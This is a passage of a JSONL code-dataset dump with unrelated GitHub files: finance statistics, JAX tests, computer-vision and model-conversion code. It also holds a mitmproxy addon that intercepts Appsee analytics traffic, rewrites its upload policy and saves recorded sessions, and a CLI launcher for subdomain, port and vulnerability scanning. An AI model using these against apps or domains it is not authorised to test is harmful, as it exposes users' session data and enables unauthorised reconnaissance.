AllNetValueData[AllNetValueData['VC_CPMC'] == Product]\n    NetValueDataThisYear = NetValueData[NetValueData['TRADE_DATE'] > 20160100]\n    n = len(NetValueData.index)\n    n1 = len(NetValueDataThisYear.index)\n    \n    # Product code\n    result.loc[Product,'产品代码']=np.unique(NetValueData['VC_CPDM'])[0]\n\n    # Product YTD return %\n    StartValue = NetValueDataThisYear.iloc[0,7]\n    EndValue = NetValueDataThisYear.iloc[(n1-1),7]\n    value = (EndValue/StartValue - 1)*100\n    result.loc[Product,'产品今年以来收益率%'] = theround(value)\n\n    # CSI 300 YTD return %\n    StartValue = HS300Data[0]\n    EndValue = HS300Data[(len(HS300Data) - 1)]\n    value = (EndValue/StartValue - 1)*100\n    result.loc[Product,'沪深300今年以来收益%'] = theround(value)\n    \n    \n    # Product YTD max drawdown %\n    netvalue = NetValueDataThisYear.iloc[:,7]\n    netvalue = list(netvalue)\n    result.loc[Product,'产品今年最大回撤%'] = max_drawdown(netvalue)\n\n    # CSI 300 YTD max drawdown %\n    netvalue = HS300Data\n    netvalue = list(netvalue)\n    result.loc[Product,'沪深300今年最大回撤%'] = max_drawdown(netvalue)\n\n    # Product YTD volatility %\n    netvalue = NetValueDataThisYear.iloc[:,7]\n    netvalue = list(netvalue)\n    result.loc[Product,'产品今年波动率%'] = volatility(netvalue)\n\n    # CSI 300 YTD volatility %\n    netvalue = HS300Data\n    netvalue = list(netvalue)\n    result.loc[Product,'沪深300今年波动率%'] = volatility(netvalue)\n\n    # Product Sharpe ratio\n    rf = 2.84 # risk-free rate: annualized yield to maturity of the 10-year government bond\n    rtn = 
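# [Editor's aside] max_drawdown() above rebuilds the running maximum with an O(n^2)
# slice per step; np.maximum.accumulate gives the same answer in one vectorized
# pass. A sketch (the sample NAV series is an assumption):
import numpy as np

nav = np.array([1.00, 1.10, 1.05, 1.20, 0.90, 1.00])
running_max = np.maximum.accumulate(nav)
drawdown = 1.0 - nav / running_max
print(round(drawdown.max() * 100, 4))   # 25.0 (%): peak 1.20 -> trough 0.90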
result.loc[Product,'产品今年以来收益率%']*250/len(netvalue)\n    result.loc[Product,'产品sharp值'] = (rtn-rf)/result.loc[Product,'产品今年波动率%']\n    \n\n    # CSI 300 Sharpe ratio\n    rf = 2.84 # risk-free rate: annualized yield to maturity of the 10-year government bond\n    rtn = result.loc[Product,'沪深300今年以来收益%']*250/len(netvalue)\n    result.loc[Product,'沪深300sharp值'] = (rtn-rf)/result.loc[Product,'产品今年波动率%']\n\n    #beta\n    netvalue1 = NetValueDataThisYear.iloc[:,7]\n    netvalue1 = list(netvalue1)\n    netvalue2 = HS300Data\n    netvalue2 = list(netvalue2)\n    #result.loc[Product,'沪深300今年波动率%'] = beta(netvalue1,netvalue2)\n\n    # Current trading day\n    result.loc[Product,'当前交易日']=time.strftime('%Y%m%d',time.localtime(time.time()))\n\n    # Account statistics date (TRADE_DATE)\n    temp = NetValueData.iloc[(n-1),0]\n    temp = time.strptime(str(temp), \"%Y%m%d\")\n    result.loc[Product,'账户统计日'] = time.strftime('%Y%m%d',temp)\n\n    # Product AUM (ALL_NETV_MKV)\n    result.loc[Product,'产品规模'] = NetValueData.iloc[(n-1),5]\n\n    # Unit NAV on the statistics date (PER_NV)\n    result.loc[Product,'统计日单位净值'] = NetValueData.iloc[(n-1),7]\n\n    # Product shares (SHARES)\n    result.loc[Product,'产品份额'] = NetValueData.iloc[(n-1),9]\n\n    # Return since inception\n    StartValue = NetValueData.iloc[0,7]\n    EndValue = NetValueData.iloc[(n-1),7]\n    result.loc[Product,'成立以来收益率%'] = (EndValue/StartValue - 1)*100\n    \n\n    # YTD return\n    StartValue = NetValueDataThisYear.iloc[0,7]\n    EndValue = NetValueDataThisYear.iloc[(n1-1),7]\n    result.loc[Product,'今年以来收益率%'] = (EndValue/StartValue - 1)*100\n\n    # Account start date\n    temp = NetValueData.iloc[0,0]\n    temp = time.strptime(str(temp), \"%Y%m%d\")\n    result.loc[Product,'账户起始日'] = time.strftime('%Y%m%d',temp)\n    # Unit NAV on the start date\n    result.loc[Product,'起始日单位净值'] = NetValueData.iloc[0,7]\n\nprint(result)\nresult.to_excel(\"托管产品汇总.xlsx\",sheet_name='Sheet1')\n    \n    \n    \n    \n\n\n\n\n\n\n","repo_name":"GaobinWang/AdvancedPython","sub_path":"PythonInAction/Task1/托管产品汇总Version1.py","file_name":"托管产品汇总Version1.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35480421334","text":"import pytest\nimport jax\nimport jax.scipy\nimport jax.numpy as jnp\nimport numpy as np\nimport numpy.testing as npt\nimport scipy.linalg\nimport tme.base_jax as tme\nfrom chirpgp.models import g, g_inv, model_chirp, disc_chirp_lcd, disc_chirp_lcd_cond_v, disc_chirp_tme, \\\n    disc_chirp_euler_maruyama, disc_m32, disc_model_lascala_lcd, model_harmonic_chirp, disc_harmonic_chirp_lcd\nfrom chirpgp.tools import lti_sde_to_disc\nfrom jax.config import config\n\nconfig.update(\"jax_enable_x64\", True)\n\nnp.random.seed(666)\n\n\nclass TestModels:\n\n    def test_g(self):\n        \"\"\"Test bijection.\n        \"\"\"\n        x = jax.random.normal(jax.random.PRNGKey(666), (20,))\n        npt.assert_allclose(x, g_inv(g(x)), rtol=1e-14, atol=0)\n\n    @pytest.mark.parametrize('lam', [0.1, 1.])\n    @pytest.mark.parametrize('b', [0.1, 1.])\n    @pytest.mark.parametrize('ell', [0.1, 1.])\n    def test_chirp_models(self, lam, b, ell):\n        \"\"\"Test model_chirp against lcd_chirp.\n        \"\"\"\n        sigma, delta = 0.1, 0.1\n        drift, dispersion, m0, P0, H = model_chirp(lam, b, ell, sigma, delta)\n        m_and_cov = disc_chirp_lcd(lam, b, ell, sigma)\n\n        dt = 0.1\n        drift_matrix = np.zeros((4, 4))\n        lcd_matrix = np.zeros((4, 4))\n        for i in range(4):\n            u = np.zeros((4,))\n            u[i] = 1.\n            drift_matrix[:, i] = drift(u)\n            lcd_matrix[:, i] = m_and_cov(u, dt)[0]\n\n        # Test mean\n        npt.assert_allclose(scipy.linalg.expm(drift_matrix * dt), lcd_matrix)\n\n        # Test cov\n        u = jnp.asarray(np.random.randn(4))\n        F, Sigma = lti_sde_to_disc(drift_matrix, dispersion(u), dt)\n        npt.assert_allclose(Sigma, m_and_cov(u, dt)[1], rtol=1e-10, atol=1e-10)\n\n    
@pytest.mark.parametrize('num_harmonics', [1, 2, 3])\n def test_harmonic_chirp_models(self, num_harmonics):\n \"\"\"Test harmonic_model_chirp against lcd_chirp.\n \"\"\"\n lam, b, ell = 1., 1., 1.\n sigma, delta = 0.1, 0.1\n drift, dispersion, m0, P0, H = model_harmonic_chirp(lam, b, ell, sigma, delta, num_harmonics)\n m_and_cov = disc_harmonic_chirp_lcd(lam, b, ell, sigma, num_harmonics)\n\n dim = num_harmonics * 2 + 2\n dt = 0.1\n drift_matrix = np.zeros((dim, dim))\n lcd_matrix = np.zeros((dim, dim))\n for i in range(dim):\n u = np.zeros((dim,))\n u[i] = 1.\n drift_matrix[:, i] = drift(u)\n lcd_matrix[:, i] = m_and_cov(u, dt)[0]\n\n # Test mean\n npt.assert_allclose(scipy.linalg.expm(drift_matrix * dt), lcd_matrix)\n\n # Test cov\n u = jnp.asarray(np.random.randn(dim))\n F, Sigma = lti_sde_to_disc(drift_matrix, dispersion(u), dt)\n npt.assert_allclose(Sigma, m_and_cov(u, dt)[1], rtol=1e-10, atol=1e-10)\n\n @pytest.mark.parametrize('lam', [0.1, 1.])\n @pytest.mark.parametrize('b', [0.1, 1.])\n def test_lcd_chirp_cond_v(self, lam, b):\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 0.1\n\n m_and_cov = disc_chirp_lcd(lam, b, 1., 1.)(u, dt)\n m_and_cov_cond_v = disc_chirp_lcd_cond_v(lam, b)(u[:2], u[2], dt)\n\n npt.assert_allclose(m_and_cov[0][:2], m_and_cov_cond_v[0])\n npt.assert_allclose(m_and_cov[1][:2, :2], m_and_cov_cond_v[1])\n\n def test_chirp_tme_against_lcd(self):\n lam, b, ell, sigma = 0.1, 0.1, 0.1, 0.1\n m_and_cov_lcd = disc_chirp_lcd(lam, b, ell, sigma)\n m_and_cov_tme = disc_chirp_tme(lam, b, ell, sigma, order=3)\n\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 1e-3\n for i in range(2):\n npt.assert_allclose(m_and_cov_lcd(u, dt)[i], m_and_cov_tme(u, dt)[i], atol=1e-5)\n\n def test_chirp_euler(self):\n \"\"\"dummy test.\n \"\"\"\n disc_chirp_euler_maruyama()\n\n def test_disc_m32(self):\n ell, sigma = 1.1, 2.2\n m_and_cov = disc_m32(ell, sigma)\n m_and_cov2 = disc_chirp_lcd(1., 1., ell, sigma)\n\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 1e-2\n npt.assert_allclose(m_and_cov(u[2:], dt)[0], m_and_cov2(u, dt)[0][2:])\n npt.assert_allclose(m_and_cov(u[2:], dt)[1], m_and_cov2(u, dt)[1][2:, 2:])\n\n @pytest.mark.parametrize('ell', [0.2, 1.])\n @pytest.mark.parametrize('sigma', [0.2, 1.])\n def test_disc_model_old_lcd(self, ell, sigma):\n \"\"\"their mean coincides when using LCD.\n \"\"\"\n m_and_cov = disc_model_lascala_lcd(ell, sigma)\n m_and_cov2 = disc_chirp_lcd(lam=jnp.array(0.), b=1., ell=ell, sigma=sigma)\n\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 1e-2\n npt.assert_allclose(m_and_cov(u, dt)[0], m_and_cov2(u, dt)[0])\n\n def test_lcd_against_tme(self):\n \"\"\"LCD and TME should give similar results.\n \"\"\"\n lam, b, ell, sigma = 0.5, 0.1, 0.5, 1.\n drift, dispersion, _, _, _ = model_chirp(lam, b, ell, sigma, 0.1)\n\n m_and_cov_lcd = jax.jit(disc_chirp_lcd(lam, b, ell, sigma))\n m_and_cov_tme = jax.jit(lambda u, dt: tme.mean_and_cov(u, dt, drift, dispersion, order=3))\n\n key = jax.random.PRNGKey(666)\n keys = jax.random.split(key, num=5)\n for key in keys:\n m = jax.random.normal(key, (4,))\n lcd_m, lcd_cov = m_and_cov_lcd(m, 0.01)\n tme_m, tme_cov = m_and_cov_tme(m, 0.01)\n\n npt.assert_allclose(lcd_m, tme_m, rtol=4e-3)\n npt.assert_allclose(lcd_cov, tme_cov, atol=1e-3)\n","repo_name":"spdes/chirpgp","sub_path":"test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} 
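# [Editor's aside] The mean tests above rely on a standard fact: for a linear SDE
# dx = A x dt + L dW, the exact transition mean over a step dt is expm(A*dt) @ x,
# which the Euler scheme (I + A*dt) @ x only approximates to first order. A
# standalone check with an arbitrary stable A (all values are assumptions):
import numpy as np
import scipy.linalg

A = np.array([[0.0, 1.0], [-1.0, -0.5]])
dt = 0.1
x = np.array([1.0, 0.0])
exact = scipy.linalg.expm(A * dt) @ x
euler = (np.eye(2) + A * dt) @ x
print(exact, euler, np.abs(exact - euler).max())   # discrepancy is O(dt^2)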
+{"seq_id":"43229641433","text":"import json\nfrom mitmproxy import http, ctx\nimport re\nimport uuid\n\nsession_id = uuid.uuid4().hex[:24]\n\ndef response(flow: http.HTTPFlow) -> None:\n global session_id\n\n # config override\n if flow.request.url.endswith(\".api.appsee.com/config\"):\n with open(\"config.json\", \"rb\") as file:\n config = json.loads(file.read())\n \n config[\"SessionId\"] = session_id\n\n flow.response.content = json.dumps(config).encode(\"utf-8\")\n\n elif flow.request.url.endswith(\".api.appsee.com/upload\"):\n content = flow.request.content\n \n decoded_content = content.decode(\"ascii\", \"backslashreplace\")\n filename = re.search('filename=\"(.+?.)\"', decoded_content).group(1)\n start = decoded_content.index(\"Content-Type: application/octet-stream\")\n\n file_data = content[start + 42:-50]\n\n with open(filename, \"ba\") as file:\n file.write(file_data)\n\n response = json.loads(flow.response.text)\n\n if \"VideoUploadPolicy\" in response:\n response[\"VideoUploadPolicy\"] = 2\n\n flow.response.text = json.dumps(response)\n \n session_id = uuid.uuid4().hex[:24]\n\n\n","repo_name":"oncecreated/appsee_watcher","sub_path":"appsee_watcher.py","file_name":"appsee_watcher.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"27211934219","text":"#!/usr/bin/python3\n# coding: utf-8\nimport argparse\nfrom core.port import Port\nfrom core.subdomain import Subdomain\nfrom core.vuln import Vuln\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('--target', default='google.com', help='domain name')\n parser.add_argument('--targets', default='domain.txt',help='domain name file')\n parser.add_argument('-s',action=\"store_true\",help='Subdomain for domain')\n parser.add_argument('-p',action=\"store_true\",help='Port for domain')\n parser.add_argument('-v',action=\"store_true\",help='Vuln for domain')\n # parser.add_argument('-i',action=\"store_true\",help='insert data to db')\n\n args = parser.parse_args()\n domains_list = []\n\n\n\n if args.target:\n domains_list.append(args.target)\n elif args.targets:\n with open(args.targets, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n domains_list.append(line)\n else:\n print('Please enter the domain name or domain name file')\n domains_list = list(set(domains_list))\n if args.s:\n print('Start Subdomain for domain')\n Subdomain(domains_list).list_subdomain()\n if args.p:\n print('Start Port for domain')\n Port(domains_list).list_subdomain()\n if args.v:\n print('Start Vuln for domain')\n Vuln(domains_list).list_subdomain()\n # if args.i:\n # print('Start insert data to db')\n # DB(domains_list).list_subdomain()","repo_name":"kN6jq/gatherpy","sub_path":"gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"21979354380","text":"# Author: Maggie Wolff\n# Due Date: 01/15/2020\n# I have not given or received any unauthorized assistance on this assignment\n# Video link: https://youtu.be/GfqDwLs-EuM\n\n# Function 'grade' will ask a series of questions regarding the assignment and return the calculated grade \n# If any of the must-have elements are missing, the questions will end and a grade of 0 points will be returned \n\ndef grade(score = 1, Grade = 0):\n while score != 0:\n score = int(input('Did the 
author submit a single uncompressed .py file? Type 1 for yes, 0 for no'))\n        if score == 0:\n            break\n        score = int(input('Did the author include their name and the date? Type 1 for yes, 0 for no'))\n        if score == 0:\n            break\n        score = int(input('Did the author include an honor statement? Type 1 for yes, 0 for no'))\n        if score == 0:\n            break\n        score = int(input('Did the author include a link to an unlisted video? Type 1 for yes, 0 for no'))\n        if score == 0:\n            break\n        correct = int(input('Out of 10, how many points for correctness?'))\n        elegance = int(input('Out of 10, how many points for elegance?'))\n        hygiene = int(input('Out of 10, how many points for code hygiene?'))\n        video = int(input('Out of 10, how many points for video quality?'))\n        Grade = correct + elegance + hygiene + video\n        break\n    return Grade\n\n# Run the function which will return the total points \nresult = grade()\n\n# Print the returned grade value \nprint('The grade is ' + str(result) + ' out of 40 points')\n","repo_name":"maggiewolff/graduate-studies","sub_path":"python-programming/Assignment0101_GradingLogic.py","file_name":"Assignment0101_GradingLogic.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41570589404","text":"import numpy as np\r\nimport cv2\r\n\r\ncap = cv2.VideoCapture(0) # '0' selects the laptop's built-in camera, '1' an external USB camera\r\nprint(cap.get(3), cap.get(4)) # check the current capture size, default is 640*480\r\ncap.set(propId=3, value=320) # set the desired capture width\r\ncap.set(propId=4, value=240) # set the desired capture height\r\nprint(cap.get(3), cap.get(4)) # verify that the settings took effect\r\nwhile (True):\r\n    ret, frame = cap.read() # read a frame and display it\r\n    cv2.imshow('frame', frame)\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):\r\n        break\r\ncap.release() # after quitting with 'q', release the camera\r\ncv2.destroyAllWindows()\r\n","repo_name":"Rex-Lapis/Image-Acquisition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"33016187568","text":"from datetime import datetime, timedelta\r\n\r\ndef getPrimes(n):\r\n    for i in range(2, n + 1):\r\n        if primeFun(i):\r\n            prime.append(i)\r\n\r\ndef primeFun(n):\r\n    if n <= 1 :\r\n        return False\r\n    for i in range(2, n):\r\n        if n % i == 0:\r\n            return False\r\n    return True\r\ndated, dayofW, n= input().split()\r\nn= int(n)\r\nprime=[]\r\ngetPrimes(365)\r\ndaysdic={0:\"Mon\", 1:\"Tue\", 2:\"Wed\", 3:\"Thu\", 4:\"Fri\", 5:\"Sat\", 6:\"Sun\"}\r\ndated=datetime.strptime(dated, \"%Y%m%d\")\r\ndays=-1\r\nfor i in prime:\r\n    date= dated + timedelta(i)\r\n    if primeFun(date.month) and daysdic[date.weekday()]==dayofW:\r\n        days=i\r\n        break\r\nif days==-1:\r\n    print(\"No\", 0)\r\nelif days<=n:\r\n    print(\"Yes\", days)\r\nelse:\r\n    print(\"No\", days)","repo_name":"Nilesh1206/mission_faang","sub_path":"MyCodeVita/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6942439900","text":"import random\nfrom logging import getLogger\n\nfrom PIL import ImageFilter\nimport numpy as np\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\nlogger = getLogger()\n\n\nclass MultiCropDataset(datasets.ImageFolder):\n    def __init__(\n        self,\n        data_path,\n        size_crops,\n        nmb_crops,\n        min_scale_crops,\n        max_scale_crops,\n        size_dataset=-1,\n        return_index=False,\n    ):\n        super(MultiCropDataset, self).__init__(data_path)\n        assert len(size_crops) 
== len(nmb_crops)\n assert len(min_scale_crops) == len(nmb_crops)\n assert len(max_scale_crops) == len(nmb_crops)\n if size_dataset >= 0:\n self.samples = self.samples[:size_dataset]\n self.return_index = return_index\n\n color_transform = [get_color_distortion(), PILRandomGaussianBlur()]\n mean = [0.485, 0.456, 0.406]\n std = [0.228, 0.224, 0.225]\n trans = []\n for i in range(len(size_crops)):\n randomresizedcrop = transforms.RandomResizedCrop(\n size_crops[i],\n scale=(min_scale_crops[i], max_scale_crops[i]),\n )\n trans.extend([transforms.Compose([\n randomresizedcrop,\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.Compose(color_transform),\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n ] * nmb_crops[i])\n self.trans = trans\n\n def __getitem__(self, index):\n path, _ = self.samples[index]\n image = self.loader(path)\n multi_crops = list(map(lambda trans: trans(image), self.trans))\n if self.return_index:\n return index, multi_crops\n return multi_crops\n\n\nclass PILRandomGaussianBlur(object):\n \"\"\"\n Apply Gaussian Blur to the PIL image. Take the radius and probability of\n application as the parameter.\n This transform was used in SimCLR - https://arxiv.org/abs/2002.05709\n \"\"\"\n\n def __init__(self, p=0.5, radius_min=0.1, radius_max=2.):\n self.prob = p\n self.radius_min = radius_min\n self.radius_max = radius_max\n\n def __call__(self, img):\n do_it = np.random.rand() <= self.prob\n if not do_it:\n return img\n\n return img.filter(\n ImageFilter.GaussianBlur(\n radius=random.uniform(self.radius_min, self.radius_max)\n )\n )\n\n\ndef get_color_distortion(s=1.0):\n # s is the strength of color distortion.\n color_jitter = transforms.ColorJitter(0.8*s, 0.8*s, 0.8*s, 0.2*s)\n rnd_color_jitter = transforms.RandomApply([color_jitter], p=0.8)\n rnd_gray = transforms.RandomGrayscale(p=0.2)\n color_distort = transforms.Compose([rnd_color_jitter, rnd_gray])\n return color_distort\n","repo_name":"facebookresearch/swav","sub_path":"src/multicropdataset.py","file_name":"multicropdataset.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":1884,"dataset":"github-code","pt":"72"} +{"seq_id":"5584665091","text":"import math\nimport sys\nfrom collections import namedtuple\n\nfrom m2cgen import ast\nfrom m2cgen.interpreters.interpreter import BaseToCodeInterpreter\n\n\nclass BinExpressionDepthTrackingMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin provides an ability to call a custom hook when depth of the\n binary expression reaches certain threshold.\n\n Subclasses must specify value for `bin_depth_threshold`.\n\n By default it creates a variable and assigns it the result of the incoming\n expression interpretation.\n\n Subclasses may override this default behaviour.\n \"\"\"\n\n # disabled by default\n bin_depth_threshold = sys.maxsize\n\n def _pre_interpret_hook(self, expr, bin_depth=0, **kwargs):\n if not isinstance(expr, ast.BinExpr):\n return super()._pre_interpret_hook(expr, **kwargs)\n\n # We track depth of the binary expressions and call a hook if it\n # reaches specified threshold.\n if bin_depth >= self.bin_depth_threshold:\n return self.bin_depth_threshold_hook(expr, **kwargs), kwargs\n\n kwargs[\"bin_depth\"] = bin_depth + 1\n return super()._pre_interpret_hook(expr, **kwargs)\n\n # Default implementation. 
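# [Editor's aside] MultiCropDataset above builds one transform pipeline per crop
# resolution and repeats it nmb_crops[i] times, so __getitem__ returns a list of
# differently-sized views of the same image. The core of that construction in
# isolation; the sizes/counts below are illustrative assumptions in the shape of
# the SwAV multi-crop setup, and the color/blur steps are omitted for brevity:
import torchvision.transforms as transforms

size_crops, nmb_crops = [224, 96], [2, 6]
min_scale, max_scale = [0.14, 0.05], [1.0, 0.14]
trans = []
for i in range(len(size_crops)):
    pipeline = transforms.Compose([
        transforms.RandomResizedCrop(size_crops[i], scale=(min_scale[i], max_scale[i])),
        transforms.RandomHorizontalFlip(p=0.5),
        transforms.ToTensor(),
    ])
    trans.extend([pipeline] * nmb_crops[i])
print(len(trans))   # 8 views per image: 2 global + 6 local crops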
Simply adds new variable.\n def bin_depth_threshold_hook(self, expr, **kwargs):\n if expr in self._cached_expr_results:\n return self._cached_expr_results[expr].var_name\n result = self._do_interpret(expr, **kwargs)\n var_name = self._cg.add_var_declaration(expr.output_size)\n self._cg.add_var_assignment(var_name, result, expr.output_size)\n return var_name\n\n\nclass LinearAlgebraMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin provides simple way to interpret linear algebra expression as\n function invocation.\n\n It also provides flag `with_linear_algebra` which indicates whether\n linear algebra was used during interpretation. It can be used to add\n corresponding third party dependencies that provide linear algebra\n operations and/or data structures.\n \"\"\"\n\n with_linear_algebra = False\n\n supported_bin_vector_ops = {}\n supported_bin_vector_num_ops = {}\n\n def interpret_bin_vector_expr(self, expr, extra_func_args=(), **kwargs):\n if expr.op not in self.supported_bin_vector_ops:\n raise NotImplementedError(f\"Op '{expr.op.name}' is unsupported\")\n\n self.with_linear_algebra = True\n\n function_name = self.supported_bin_vector_ops[expr.op]\n\n return self._cg.function_invocation(\n function_name,\n self._do_interpret(expr.left, **kwargs),\n self._do_interpret(expr.right, **kwargs),\n *extra_func_args)\n\n def interpret_bin_vector_num_expr(self, expr, extra_func_args=(), **kwargs):\n if expr.op not in self.supported_bin_vector_num_ops:\n raise NotImplementedError(f\"Op '{expr.op.name}' is unsupported\")\n\n self.with_linear_algebra = True\n\n function_name = self.supported_bin_vector_num_ops[expr.op]\n\n return self._cg.function_invocation(\n function_name,\n self._do_interpret(expr.left, **kwargs),\n self._do_interpret(expr.right, **kwargs),\n *extra_func_args)\n\n\nSubroutine = namedtuple('Subroutine', ['name', 'expr'])\n\n\nclass SubroutinesMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin provides ability to split the code into subroutines based on\n the size of the AST.\n\n Subclasses only need to implement `create_code_generator` method.\n\n Their code generators should implement 3 methods:\n - function_definition;\n - function_invocation;\n - add_return_statement.\n\n Interpreter should prepare at least one subroutine using method\n `enqueue_subroutine` and then call method `process_subroutine_queue` with\n instance of code generator, which will be populated with the result code.\n \"\"\"\n\n # disabled by default\n ast_size_check_frequency = sys.maxsize\n ast_size_per_subroutine_threshold = sys.maxsize\n\n def __init__(self, *args, **kwargs):\n self._subroutine_idx = 0\n self.subroutine_expr_queue = []\n super().__init__(*args, **kwargs)\n\n def process_subroutine_queue(self, top_code_generator):\n \"\"\"\n This method should be called from the interpreter to start processing\n subroutine queue.\n \"\"\"\n self._subroutine_idx = 0\n\n while len(self.subroutine_expr_queue):\n self._reset_reused_expr_cache()\n subroutine = self.subroutine_expr_queue.pop(0)\n subroutine_code = self._process_subroutine(subroutine)\n top_code_generator.add_code_lines(subroutine_code)\n\n def enqueue_subroutine(self, name, expr):\n self.subroutine_expr_queue.append(Subroutine(name, expr))\n\n def _pre_interpret_hook(self, expr, ast_size_check_counter=0, **kwargs):\n if isinstance(expr, ast.BinExpr) and not expr.to_reuse:\n frequency = self._adjust_ast_check_frequency(expr)\n self.ast_size_check_frequency = min(frequency, self.ast_size_check_frequency)\n\n ast_size_check_counter += 1\n if 
ast_size_check_counter >= self.ast_size_check_frequency:\n ast_size_check_counter = 0\n ast_size = ast.count_exprs(expr)\n if ast_size > self.ast_size_per_subroutine_threshold:\n function_name = self._get_subroutine_name()\n self.enqueue_subroutine(function_name, expr)\n return self._cg.function_invocation(function_name, self._feature_array_name), kwargs\n\n kwargs['ast_size_check_counter'] = ast_size_check_counter\n\n return super()._pre_interpret_hook(expr, **kwargs)\n\n def _adjust_ast_check_frequency(self, expr):\n \"\"\"\n The logic below counts the number of non-binary expressions\n in a non-recursive branch of a binary expression to account\n for large tree-like models and adjust the size check frequency\n if necessary.\n \"\"\"\n cnt = None\n if not isinstance(expr.left, ast.BinExpr):\n cnt = ast.count_exprs(expr.left, exclude_list={ast.BinExpr})\n elif not isinstance(expr.right, ast.BinExpr):\n cnt = ast.count_exprs(expr.right, exclude_list={ast.BinExpr})\n if cnt and cnt < self.ast_size_per_subroutine_threshold:\n return math.ceil(self.ast_size_per_subroutine_threshold / cnt)\n return self.ast_size_check_frequency\n\n def _process_subroutine(self, subroutine):\n \"\"\"\n Handles single subroutine. Creates new code generator and defines a\n function for a given subroutine.\n \"\"\"\n is_vector_output = subroutine.expr.output_size > 1\n\n self._cg = self.create_code_generator()\n\n with self._cg.function_definition(\n name=subroutine.name,\n args=[(True, self._feature_array_name)],\n is_vector_output=is_vector_output):\n last_result = self._do_interpret(subroutine.expr)\n self._cg.add_return_statement(last_result)\n\n return self._cg.finalize_and_get_generated_code()\n\n def _get_subroutine_name(self):\n subroutine_name = f\"subroutine{self._subroutine_idx}\"\n self._subroutine_idx += 1\n return subroutine_name\n\n # Methods to be implemented by subclasses.\n\n def create_code_generator(self):\n raise NotImplementedError\n\n\nclass PowExprInfixMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin is used for languages that provide the exponentiation operation in a form\n of an infix operator. 
Such languages include Haskell, F#, R and others.\n\n    The operator used by default is \"**\", but it can be overridden by setting an appropriate\n    value in `pow_operator`.\n    \"\"\"\n\n    pow_operator = \"**\"\n\n    infix_expressions = (*BaseToCodeInterpreter.infix_expressions, ast.PowExpr)\n\n    def interpret_pow_expr(\n        self,\n        expr,\n        is_left_from_parent=None,\n        parent_precedence=None,\n        is_parent_associative=None,\n        **kwargs\n    ):\n        base_result = self._do_interpret(\n            expr.base_expr,\n            is_left_from_parent=True,\n            parent_precedence=expr.precedence,\n            **kwargs\n        )\n        exp_result = self._do_interpret(\n            expr.exp_expr,\n            is_left_from_parent=False,\n            parent_precedence=expr.precedence,\n            is_parent_associative=expr.is_associative,\n            **kwargs\n        )\n        return self._cg.infix_expression(\n            left=base_result,\n            right=exp_result,\n            op=self.pow_operator,\n            wrap=self._wrap_infix_expr(\n                expr,\n                is_left_from_parent=is_left_from_parent,\n                parent_precedence=parent_precedence,\n                is_parent_associative=is_parent_associative\n            )\n        )\n\n\nclass PowExprFunctionMixin(BaseToCodeInterpreter):\n    \"\"\"\n    This mixin is used for languages that provide the exponentiation operation as a function.\n    Such languages include C, Java, Python and others.\n\n    The name of the function must be set in `power_function_name` by implementing subclasses.\n    \"\"\"\n\n    power_function_name = NotImplemented\n\n    def interpret_pow_expr(self, expr, **kwargs):\n        if self.power_function_name is NotImplemented:\n            raise NotImplementedError(\"Power function is not provided\")\n        self.with_math_module = True\n        base_result = self._do_interpret(expr.base_expr, **kwargs)\n        exp_result = self._do_interpret(expr.exp_expr, **kwargs)\n        return self._cg.function_invocation(self.power_function_name, base_result, exp_result)\n","repo_name":"BayesWitnesses/m2cgen","sub_path":"m2cgen/interpreters/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","stars":2652,"dataset":"github-code","pt":"72"} +{"seq_id":"22748293571","text":"from collections import deque\n\nclass PinTracker:\n    def __init__(self, turn, turn_inv, max_val=1023, bounce_threshold=100):\n        self.turn = turn\n        self.turn_inv = turn_inv\n        self.previous_values = deque([0 for _ in range(10)])\n        self.previous_indices = deque([0 for _ in range(10)])\n        self.last_state = 0\n        self.max_val = max_val\n        self.bounce_threshold = bounce_threshold\n        self.states = [0.25 * i * self.max_val for i in [1, 2, 3, 4]]\n\n    def update(self, value):\n        self.previous_values.appendleft(value)\n        self.previous_values.pop()\n\n        max_diff = max(self.previous_values) - min(self.previous_values)\n        if max_diff > self.bounce_threshold:\n            value = self.max_val\n\n        current_index = 0\n        while value > self.states[current_index]:\n            current_index += 1\n\n        self.previous_indices.appendleft(current_index)\n        self.previous_indices.pop()\n\n        result = None\n\n        if len(set(self.previous_indices)) == 1:\n            d = (current_index - self.last_state) % 4\n            if d != 0:\n                result = {1: self.turn, 2: None, 3: self.turn_inv}[d]\n            self.last_state = current_index\n\n        return result\n\n#trackers = [PinTracker(s) for s in \"udlrfb\"]\ntrackers = [\n    